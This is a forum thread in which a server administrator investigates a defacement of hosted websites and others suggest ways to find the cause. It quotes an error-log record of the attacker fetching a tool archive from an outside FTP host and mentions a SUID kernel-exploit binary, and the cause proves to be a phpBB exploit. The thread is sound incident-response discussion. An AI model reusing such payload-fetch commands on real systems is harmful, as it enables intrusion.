Hi,
I wonder if anyone can explain how the following problem might have occurred. On the server in question there are a number of users hosting websites in their $HOME/public_html directories. This morning, the index file in each directory (be it index.htm, index.html or index.php) was replaced with an index file (with the same extension as the one that was originally there) containing some kind of anti-war message in Spanish. I was able to restore the correct files from a backup.

I can find no evidence of how this might have occurred. The ownerships and permissions of all the files was unchanged. Nobody had (or would have been able to) log in by means of SSH, and the messages log showed no evidence of FTP logins.

I think it might have been due to a problem with a PHP or Perl script on somebody's website and as a precaution I have upgraded Apache and MySQL to the lates versions, also found a couple of formmail.pl scripts in user's cgi-bin directories and removed them. But I am just guessing really because I don't know how the problem happened in the first place. Does anyone have any idea about how it might have happened, or how to go about finding the cause ?

Many thanks
Abe

You could sort through your httpd logs. Look for access times so you could pin point what happened around the time of the file changes. Also grab a webserver scanner like nikto (cirt.net) . It will be able to tell you if you have any immediate script flaws.


Cheers,
RYan

Thanks Ryan,
I looked in the httpd error_log and found numerous entries like this :

--21:54:38-- ftp://darktr0jan:*password*@gate.pol.../neon20.tar.gz
=> `neon20.tar.gz.59'
Resolving gate.polarhome.com... done.
Connecting to gate.polarhome.com[81.216.198.11]:21... connected.
Logging in as darktr0jan ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /bandy ... done.
==> PORT ... done. ==> RETR neon20.tar.gz ... done.
Length: 26,405 (unauthoritative)

0K .......... .......... ..... 100% 7.13 KB/s

21:54:56 (7.13 KB/s) - `neon20.tar.gz.59' saved [26405]

...and found the corresponding file in /tmp. Also in /tmp there was a hidden folder called .f containing a 'kmod' executable with SUID permissions. So I guess that was it ...

But I would really like to prevent httpd from allowing people to do this kind of stuff !
thanks
Abe

If you haven't been keeping up with security updates (and Redhat 7.2 hasn't been supported for some time now), then there were likely a number of security vulnerabilities in your system. The kmod is stuff is likely an exploit for the kernel ptrace vuln that allowed an attacker to gain root priviledges on the system. So if your kernel hasn't been updated, then you could be in real trouble. Finding the point of entry is important, but updating software after-the-fact makes it kind of pointless once they've gained access.

You should go through all the security and system logs, keeping an eye open for kernel panics or oops or any other application error/failures that could be clue that something was exploited. I'd also recommend going through the bash_history files of all the users, especially root, looking for strange activity. Take a look at /etc/password for any new users or users with a UID of 0. Run rpm -Va to verify integrity of system packages and definitely download chkrootkit or rootkit hunter and run a scan to look for signs of an intrusion.

I would recommend a re-install of the OS. Also get in contact with the abuse admin for www.polarhome.com about the "cracker" getting his tools from a legit site he/her may have.


Cheers

Thanks everyone. It turned out to be due to the phpBB 2 'highlighting' exploit ...
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
Before becoming aware of this . I ended up re-installing the OS on the compromised server and moving the hosting accounts on it onto a different server - which was then itself hacked ! :-(